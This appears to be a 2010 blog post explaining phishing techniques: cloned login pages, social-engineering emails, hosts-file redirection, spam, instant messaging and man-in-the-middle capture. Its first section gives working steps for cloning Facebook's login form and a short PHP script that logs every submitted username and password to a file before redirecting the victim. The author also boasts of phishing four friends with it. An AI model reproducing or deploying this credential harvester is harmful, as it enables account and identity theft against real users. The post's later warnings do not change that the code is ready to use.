Phishing

April 6, 2010, by | Start Discussion


Phishing term originates from the word  “fishing” and the well known pre-fix ”ph”  like in “Phreaks” traces back to early hackers who were involved in “phreaking”- The hacking of telephone systems. Phishing, also referred to as brand spoofing or carding, is a variation on "fishing," the idea being that bait is thrown out with the hope that while most will ignore the bait, some will be tempted into biting.

Nowadays, it is mostly meant as a conjunction of “password” and “fishing”. Also termed as the 21st century crime. Phishing is basically a form of online identity theft employing tricking, social engineering and technical action to steal user credentials such as usernames and passwords. But over the times, the definition of Phishing has blurred and expanded. The term phishing covers not only obtaining user account details, but now includes access to all personal and financial data.  What originally included tricking users into replying to emails for passwords and credit card details has now expanded into fake websites, installation of Trojan horse key loggers and screen captures, and man-in-the-middle data proxies – delivered through any electronic communication channel.
 

Where can Phishing take place?

Targeted data sources include especially Web pages, email spam, IRC, instant messaging services and domain names. Mostly related to sites like eBay, PayPal, facebook, twitter, MySpace, etc.

Methods of Phishing

1. Hosting a web page

A fake website with exactly similar contents as the legitimate website is created and a homogeneous domain name address such as “payepal.com” or like “faceb00k.com” here the  letter ‘o’ is replaced with the number ‘0’ or such similar names. The source code of the original site is copied, modified and hosted.

form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit=";var d = document.documentElement;return d.onsubmit && d.onsubmit(event);">

this is the part of the facebook  login page which is den modified to form method="GET" action="post.php " id="login_form" onsubmit=";var d = document.documentElement;return d.onsubmit && d.onsubmit(event);">

and in the post.php the following code is written:

<?php

header("Location: http://www.facebook.com");

$handle = fopen("passes.txt", "a");

foreach($_GET as $variable => $value)

{

fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "rn");

}

fwrite($handle, "rn");

fclose($handle);

exit;

?>

The line in the code: header("Location: http://www.facebook.com");  indicates where the fake login page should redirect to. So by using this method phisher would create a fake website of any site like facebook, gmail, paypal or some bank site and can abuse the personal information. I had created a facebook page when I learnt  phishing and had sent the link to four of my close friends and guess what my hit ratio was 100% as I had said check out my new girl friends photos and they got so curious that they did not care about their password. So people beware when you click on a particular link, “THINK BEFORE YOU LINK”.
 

2.Social Engineering

Phishing attacks are usually a combination of technical and social engineering practices. In the majority of cases the Phisher persuades the victim to perform a series of actions that will provide access to confidential information.  In all cases the phisher uses a trusted source e.g. the helpdesk their bank, automated support response from their favorite online retailer. However the phisher has many other methods of social engineering victims into surrendering confidential information.

In the real example below, the email recipient is likely to have believed that their banking information has been used by someone else to purchase unauthorized services. The victim then would attempt to contact the email sender to inform them about the mistake and cancel the transaction. Depending upon the specification of scams, the Phisher would ask or provide an online secure webpage for the recipient to type-in their confidential details such as address, credit card number, security code, etc. to reverse the transaction thereby verifying the live email address and potentially using this information on to other spammers and also capturing enough information to complete a real transaction.

3.HOSTS file modification

The hosts file located at c:WindowsSystem32driversetchosts can be used to  used in an operating system to map hostnames to IP addresses . Thus a particular site can be redirected to some other site. So this method can be used by a Phisher to phish in a smart way without creating much doubt in the user’s mind like redirecting to twiitter.com for twitter.com. A phisher using malware activity or by using web based programs can modify the hosts file hence redirecting a legitimate website to a fake website.
 

4.Emails and spam

Phishing attacks by email are very common. Phishers can send emails to millions of legitimate email addresses within a few hours using techniques and tools used by Spammers or minutes using distributed Trojan networks.  User data does get sold by various people and sometimes even by reputed domains, thus these spammers get the email ID’s which they use for criminal activities.

Phishers use flaws in the common mail server communication protocol (SMTP), and they are able to create emails with fake “Mail From:” headers and imitate any organization.

methods used in Phishing emails:

    * Imitation of legitimate corporate emails with minor URL changes
    * malware attachments to emails
    * official looking emails
    * fake posts to message boards and mailing lists

A Real-life email phishing example:
 

This is the mail which I received saying verifying identity immediately as it was a routine check for security process and to click on the link for updating which actually leads to a phishing site. It also contains warning that if I fail to do so it means that the account is blocked and does not belong to me. The ID from which the mail is generated also sounds to be a professional one admin@ncua.gov so a user may tend to follow the procedure and sacrifice his personal information. Most attacks of these kinds are related to Bank account and at times are successful too.

5.IRC and Instant messaging

IRC and Instant messaging are the communication channels which are very popular today. IRC and IM clients allow embedded dynamic content to be sent by its users thus many of the web-based phishing attacks can be implemented here. The common usage of Bots (automated programs that listen and participate in group discussions) in many of the popular channels, so now it is very easy for a Phisher to anonymously send related links and fake information to probable victims.

6. man-in-the-middle attack  

In man-in-the-middle attack (MITM), the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker. So for Phishing the phisher would capture that GET request with tool like Paros, and redirect to the phishing page. For e.g. you are requested for icicibank.com, the attacker could capture that GET request and send you an icici.evil.com.

7. Report Phishing

Author bio not avialable

Leave a Reply